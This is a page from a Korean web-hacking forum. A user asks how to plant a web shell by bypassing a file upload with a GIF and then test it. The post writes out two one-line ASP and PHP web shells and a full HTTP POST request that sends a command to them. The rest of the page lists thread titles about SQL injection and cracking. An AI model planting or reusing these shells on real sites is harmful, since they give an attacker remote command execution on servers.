214,

9/11

회원가입

로그인

stoopynice

웹쉘 관련 질문있습니다.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_Web&no=209 [복사]

그 파일 업로드 우회해서 (gif 파일에 아래 코드를 넣어서)
<%execute(request("cmd"))%>
<?php eval($_POST[cmd]);?>
페이지에 삽입한다음에 ipconfig같은 명령을 실험해보고 싶은데
(위에 코드가 cmd 불러와서 cmd 명령하는거죠?)
피들러에 composer 탭에 아래 내용 보내면 되나요??
POST http://\\\\/index.php?***.gif
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: ***/index.php
WS=110&CCODE=000101
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
DNT: 1
Host: ***
Cookie: PHPSESSID=h6ddjfsn45r1sqc9tvg2p6pje0
Content-Length: 9
cmd=ipconfig;

요런식으로 execute해서 테스트하면되나요?

Hit : 4669 Date : 2015/07/26 12:22

54

웹해킹 공부 질문이요~[2]

ansqudfyd

05/02

3491

53

이 공격구문에 대한 설명 부탁드립니다.[1]

ju3622

05/05

3521

52

[re] 이 공격구문에 대한 설명 부탁드립니다.

cosine

06/28

2652

51

php책 추천 부탁드립니다.[1]

h@cking2013

06/05

3909

50

맥북으로 웹 모의해킹

chachaco

06/16

3936

49

KISA 해킹방어 훈련장 WEB 문제와 관련해서 질문드립니다.[1]

jhjang1005

07/16

3468

웹쉘 관련 질문있습니다.

stoopynice

07/26

4668

47

sqlmap 관련및 데이터베이스 관련에 질문합니다[1]

r0ki

10/10

3379

46

URL을 활용한 Json 파일 API분석

huny606

12/24

2875

45

궁금해서 질문합니다~[2]

ju3622

01/09

2666

44

의뢰입니다[4]

jjogun

01/30

3005

43

프록시 프로그램이 안됩니다[1]

yayaja11

03/05

2842

42

sql injection 공격 오류반환질문이요.[4]

yayaja11

03/21

2786

41

완전초보라 궁금하네요 웹쉘 XSS 등[1]

sm8303

04/21

3756

40

쿠키문의[3]

sm8303

04/21

2812

39

HTTP 헤더[1]

chaneyoon

04/30

2796

38

바둑이 올뷰어 제작자 모십니다

killerkor

05/25

3056

37

크래킹 해주실분 구해요 (불법x) 사례드립니다.

mss0812

06/22

3197

36

칼리리눅스 웹 취약점 점검 스캐너 질문..

duwkakstp1

08/21

4084

35

게시물 비밀번호 우회

qkrrmsgP

11/08

4135

[1][2][3][4][5][6][7][8] 9 [10]..[11]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org